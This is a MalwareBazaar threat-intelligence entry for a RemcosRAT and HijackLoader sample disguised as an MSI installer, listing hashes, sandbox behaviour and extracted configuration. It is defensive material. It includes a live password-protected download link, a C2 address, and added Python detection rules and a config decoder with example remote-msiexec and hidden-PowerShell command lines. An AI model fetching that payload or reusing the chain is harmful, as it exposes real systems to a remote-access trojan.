MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

RemcosRAT
Vendor detections: 11

SHA256 hash: bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449
SHA3-384 hash: 0c9bf8878d4bc3c174538f0164206c623b47998746659221f83c58b07f333be2b9f9b25b507b98ec35da0b7dbd0a2806
SHA1 hash: fd9037a16f327a64f8b2fd8ff9f6664ae307ca39
MD5 hash: 028578212baa7456aae40d4bdb5792e5
humanhash: fifteen-oklahoma-hawaii-island
File name: LauncherPred8.3.389 stablesetup.msi
Signature: RemcosRAT
File size: 3'232'256 bytes
First seen: 2024-11-30 00:20:43 UTC
Last seen: Never
File type: Microsoft Software Installer (MSI) msi
MIME type: application/x-msi
ssdeep: 49152:muoukMo27Epq0n8Toc4Ur8r6F5mCmR+Ov0Rn0rItYcuwwERO9qZFTvqPvO6Ezvsk:1Yn8ToWo6AvAYcuwr9qrn
Threatray: 4'630 similar samples on MalwareBazaar
TLSH: T122E5AF11B98AC533E67D4176E968FB2B247ABFE2073184DB63E8398E4D708C15275F12
TrID: 80.0% (.MSI) Microsoft Windows Installer (454500/1/170)
      10.7% (.MST) Windows SDK Setup Transform script (61000/1/5)
      7.8% (.MSP) Windows Installer Patch (44509/10/5)
      1.4% (.) Generic OLE2 / Multistream Compound (8000/1)
Magika: msi
Reporter: aachum
Tags: msi RemcosRAT


iamaachum
https://telegra.ph/stake-predictor-11-29 => https://app.box.com/s/qulsz9aubfz07k4rz85i7ld4jz6nr4i0 (Password 1234)

Remcos C2: 185.157.162.126:1995

Intelligence


File Origin
# of uploads: 1
# of downloads: 109
Origin country: ES

Vendor Threat Intelligence
Verdict: Malicious
Score: 95.7%
Tags: shellcode dropper remcos virus

Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: anti-vm cmd cscript fingerprint lolbin msiexec remote timeout wix
Result
Threat name: Clipboard Hijacker, MicroClip, Remcos
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signature
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Injects a PE file into a foreign processes
Installs a MSI (Microsoft Installer) remotely
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential evasive VBS script found (sleep loop)
Query firmware table information (likely to detect VMs)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Yara detected Clipboard Hijacker
Yara detected MicroClip
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph ID: 1565485, Sample: LauncherPred8.3.389 stables..., Startdate: 30/11/2024, Architecture: WINDOWS, Score: 100. The graph image is rendered here as a process tree; dropped files, contacted hosts and the signatures attached to each node are listed beneath it.

Network:
  185.157.162.126 (OBE-EUROPE Obenetwork Europe, SE, Sweden)
  shed.dual-low.s-part-0035.t-0009.t-msedge.net
  github.com 20.233.83.145:443 (MICROSOFT-CORP-MSN-AS-BLOCK, United States), contacted by msiexec.exe
  raw.githubusercontent.com 185.199.108.133:443 (FASTLY, Netherlands), contacted by msiexec.exe
  127.0.0.1, contacted by the "4 other processes" node
  3 other IPs or domains

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 13 other signatures

Process tree:
  msiexec.exe
    dropped: C:\Windows\Installer\MSID1D3.tmp (PE32), C:\Windows\Installer\MSID1B3.tmp (PE32), C:\Windows\Installer\MSID183.tmp (PE32), 6 other files (4 malicious)
    Updwork.exe
      dropped: C:\Users\user\AppData\Local\...\zlib1.dll (PE32)
      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 4 other signatures
      WerFault.exe
        signatures: Found API chain indicative of debugger detection
    EHttpSrv.exe
      signatures: Found API chain indicative of debugger detection; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
      cmd.exe
        dropped: C:\Users\user\AppData\Local\...\ymvguouuwjjha (PE32)
        signatures: Writes to foreign memory regions; Found hidden mapped module (file has been removed from disk); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
        EHttpSrv.exe
          signatures: Found direct / indirect Syscall (likely to bypass EDR)
        conhost.exe
    msiexec.exe
  msiexec.exe
    dropped: C:\Windows\Installer\MSIE0FB.tmp (PE32), C:\Windows\Installer\MSIE0BC.tmp (PE32), C:\Windows\Installer\MSIE09B.tmp (PE32), 9 other malicious files
    cmd.exe
      cscript.exe
        signatures: Suspicious powershell command line found
        powershell.exe
          wscript.exe
            signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Installs a MSI (Microsoft Installer) remotely; Wscript called in batch mode (suppress errors)
            wscript.exe
              signatures: Installs a MSI (Microsoft Installer) remotely
              msiexec.exe
            cmd.exe
              WMIC.exe
                WmiPrvSE.exe
              conhost.exe
            cmd.exe
              taskkill.exe
              conhost.exe
            2 other processes
              taskkill.exe
              conhost.exe
              conhost.exe
          conhost.exe
      conhost.exe
      timeout.exe
      5 other processes
    msiexec.exe
      signatures: Query firmware table information (likely to detect VMs)
  RaftelibeGasrss.exe
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Tries to detect virtualization through RDTSC time measurements; 3 other signatures
    WerFault.exe
  4 other processes
    signatures: Potential evasive VBS script found (sleep loop); Maps a DLL or memory area into another process
    cmd.exe
      dropped: C:\Users\user\AppData\Local\Temp\taohlye (PE32)
      EHttpSrv.exe
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
      conhost.exe
    cmd.exe
      conhost.exe
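The sandbox tree above shows the chain the vendors on this page flag: msiexec.exe spawning cmd.exe, cscript.exe launching powershell.exe, wscript.exe run in batch mode from a Temp path, and a script host invoking msiexec.exe against a remote package. The Python below, added here as an example and not code from MalwareBazaar or from any vendor listed on this page, turns those observations into process-creation rules of the kind the Sigma hits above describe, and runs them over a constructed event list modelled on the tree. The rule names, the suspicious-folder list, the script file names, the package URL and the PowerShell arguments are all assumptions for illustration and are not taken from the sample.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Folders from which script-host execution is treated as suspicious
# (constructed list for this example; tune it to your environment).
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\",
                   "\\users\\public\\", "\\programdata\\")

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# wscript //B runs the script in batch mode, so script errors never surface as dialogs.
WSCRIPT_BATCH_RE = re.compile(r"(?:^|\s)//b\b", re.IGNORECASE)


def rule_msiexec_remote_install(e: ProcEvent) -> bool:
    """msiexec.exe given an http(s) package location instead of a local file."""
    return basename(e.image) == "msiexec.exe" and URL_RE.search(e.command_line) is not None


def rule_script_host_from_suspicious_dir(e: ProcEvent) -> bool:
    """wscript/cscript running a script that lives under a temp or staging folder."""
    cl = e.command_line.lower()
    return basename(e.image) in SCRIPT_HOSTS and any(d in cl for d in SUSPICIOUS_DIRS)


def rule_script_host_spawns_powershell(e: ProcEvent) -> bool:
    """PowerShell whose parent is a script host."""
    return basename(e.parent_image) in SCRIPT_HOSTS and basename(e.image) in POWERSHELL


def rule_wscript_batch_mode(e: ProcEvent) -> bool:
    """wscript.exe started with //B (batch mode)."""
    return basename(e.image) == "wscript.exe" and WSCRIPT_BATCH_RE.search(e.command_line) is not None


def rule_script_host_spawns_installer(e: ProcEvent) -> bool:
    """A script host launching msiexec.exe (script-driven installer chain)."""
    return basename(e.parent_image) in SCRIPT_HOSTS and basename(e.image) == "msiexec.exe"


RULES = {
    "msiexec_remote_install": rule_msiexec_remote_install,
    "script_host_from_suspicious_dir": rule_script_host_from_suspicious_dir,
    "script_host_spawns_powershell": rule_script_host_spawns_powershell,
    "wscript_batch_mode": rule_wscript_batch_mode,
    "script_host_spawns_installer": rule_script_host_spawns_installer,
}


def evaluate(events):
    """Return {rule_name: [indexes of matching events]} for every rule, matched or not."""
    hits = {name: [] for name in RULES}
    for idx, ev in enumerate(events):
        for name, pred in RULES.items():
            if pred(ev):
                hits[name].append(idx)
    return hits


# Constructed event chain modelled on the sandbox tree; script names, the package
# URL and the PowerShell arguments are placeholders, not the sample's real values.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              r'msiexec.exe /i "C:\Users\user\Downloads\setup.msi"'),              # 0: local install, benign
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r'cmd.exe /c cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\stage.vbs"'),  # 1
    ProcEvent(r"C:\Windows\System32\cscript.exe", r"C:\Windows\System32\cmd.exe",
              r'cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\stage.vbs"'),  # 2
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cscript.exe",
              'powershell.exe -NoProfile -WindowStyle Hidden -Command "Start-Sleep -Seconds 1"'),  # 3
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'wscript.exe //B "C:\Users\user\AppData\Local\Temp\next.js"'),        # 4
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\wscript.exe",
              "msiexec.exe /i https://example.invalid/package.msi /qn"),            # 5
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),  # 6: benign
]

if __name__ == "__main__":
    for name, idxs in evaluate(SAMPLE_EVENTS).items():
        for i in idxs:
            print(f"{name:34} -> [{i}] {SAMPLE_EVENTS[i].command_line}")
```

Each rule is deliberately narrow so that a single match is a lead rather than a verdict; the value is in the chain, where one parent-child lineage (msiexec.exe, cmd.exe, cscript.exe, powershell.exe, wscript.exe, msiexec.exe) trips four of the five rules while the benign local install and the notepad launch trip none.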
Threat name: Win32.Backdoor.Remcos
Status: Suspicious
First seen: 2024-11-30 00:21:18 UTC
File Type: Binary (Archive)
Extracted files: 134
AV detection: 8 of 38 (21.05%)
Threat level: 5/5

Result
Malware family:
Score: 10/10
Tags: family:hijackloader family:remcos botnet:v2 discovery execution loader rat
Behaviour
Delays execution with timeout.exe
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
NSIS installer
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Program Files directory
Drops file in Windows directory
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Blocklisted process makes network request
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Use of msiexec (install) with remote resource
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Remcos
Remcos family
Malware Config
C2 Extraction: 185.157.162.126:1995
Please note that we are no longer able to provide a coverage score for Virus Total.
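The C2 listed above is what a sandbox recovers from the sample's decrypted configuration. As an added example, not code from this page or from any vendor shown on it, the Python below decodes a Remcos-style SETTINGS blob using the layout described in public Remcos analyses: a key-length byte, the RC4 key, then the RC4-encrypted configuration whose fields are separated by the byte sequence pipe, 0x1e, 0x1e, 0x1f, pipe, with the first field holding one or more host:port:flag C2 entries separated by 0x1e, 0x1e, 0x1f. That layout, both separators and the meaning of the third element of a C2 entry are assumptions not stated on this page, and the blob is constructed with the block's own encoder so the code runs offline. Only the first C2 string is taken from this entry; the key, the backup C2 and the remaining fields are placeholders.

```python
# Decoder for a Remcos-style SETTINGS blob: key-length byte, RC4 key, RC4 ciphertext.
# Layout and separators follow public analyses and are assumptions for this example.

FIELD_SEP = b"|\x1e\x1e\x1f|"  # delimiter between configuration fields (assumed)
C2_SEP = b"\x1e\x1e\x1f"       # delimiter between C2 entries inside the first field (assumed)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_settings(blob: bytes) -> bytes:
    """Split the blob into its length-prefixed key and ciphertext; return the plaintext config."""
    if len(blob) < 2:
        raise ValueError("blob too short")
    key_len = blob[0]
    key = blob[1:1 + key_len]
    if key_len == 0 or len(key) != key_len:
        raise ValueError("truncated or empty key")
    return rc4(key, blob[1 + key_len:])


def parse_c2_entries(first_field: bytes):
    """Turn host:port:flag entries into dicts; entries that do not fit that shape are kept raw."""
    entries = []
    for raw in first_field.split(C2_SEP):
        if not raw:
            continue
        parts = raw.split(b":")
        if len(parts) == 3 and parts[1].isdigit():
            entries.append({"host": parts[0].decode("latin-1"),
                            "port": int(parts[1]),
                            "flag": parts[2].decode("latin-1")})  # meaning varies by version
        else:
            entries.append({"raw": raw})
    return entries


def extract_config(blob: bytes) -> dict:
    """Decrypt, split into fields, and return the C2 list plus the remaining fields."""
    fields = decrypt_settings(blob).split(FIELD_SEP)
    return {"c2": parse_c2_entries(fields[0]), "fields": fields[1:]}


def c2_strings(blob: bytes):
    """host:port strings in config order, the form MalwareBazaar lists under C2 Extraction."""
    return [f"{c['host']}:{c['port']}" for c in extract_config(blob)["c2"] if "host" in c]


def build_settings(key: bytes, fields) -> bytes:
    """Inverse of decrypt_settings; used only to construct the sample blob below."""
    return bytes([len(key)]) + key + rc4(key, FIELD_SEP.join(fields))


# Constructed blob: the first C2 is the one this entry lists; the key, the backup C2
# and the trailing fields are placeholders and say nothing about the real sample.
SAMPLE_BLOB = build_settings(
    b"constructed-rc4-key",
    [C2_SEP.join([b"185.157.162.126:1995:0", b"backup-c2.invalid:2404:1"]),
     b"v2", b"placeholder-field"],
)

if __name__ == "__main__":
    print(c2_strings(SAMPLE_BLOB))  # ['185.157.162.126:1995', 'backup-c2.invalid:2404']
```

On a real sample the blob would be read out of the binary's resource section rather than built in memory; the decoder rejects a blob whose key-length byte runs past the data, which is the usual symptom of having cut the resource at the wrong offset.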

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: DebuggerCheck__API
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: DebuggerCheck__QueryInfo
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: Detect_LATAM_MSI_Banker

Rule name: NET
Author: malware-lu

Rule name: RansomPyShield_Antiransomware
Author: XiAnzheng
Description: Check for Suspicious String and Import combination that Ransomware mostly abuse (can create FP)

Rule name: suspicious_msi_file
Author: Johnk3r
Description: Detects common strings, DLL and API in Banker_BR

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: RemcosRAT
File type: Microsoft Software Installer (MSI) msi
SHA256: bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449 (this sample)
